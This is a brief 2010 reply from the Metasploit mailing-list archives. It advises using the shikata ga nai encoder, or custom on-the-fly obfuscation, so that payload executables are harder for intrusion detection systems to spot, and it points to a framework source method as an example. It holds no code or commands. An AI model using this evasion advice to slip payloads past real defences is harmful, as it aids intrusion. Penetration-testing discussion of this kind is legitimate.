Metasploit mailing list archives

Re: Dynamic creation of payload executables with metasm

From: scriptjunkie <scriptjunkie1 () googlemail com>
Date: Mon, 31 May 2010 13:42:31 -0400

The easiest way would be to use one of the encoder stubs. shikata ga
nai is probably the best in the framework. But since it has been
public for a while, maybe some intrusion detection systems can spot
it. If you're writing your own shellcode, you're probably really
paranoid, and you may prefer to do some code obfuscation on the fly.
Look at msf3/lib/msf/util/exe.rb at the win32_rwx_exec method for an
example of doing this.

On Mon, May 31, 2010 at 12:21 PM, John Biondolillo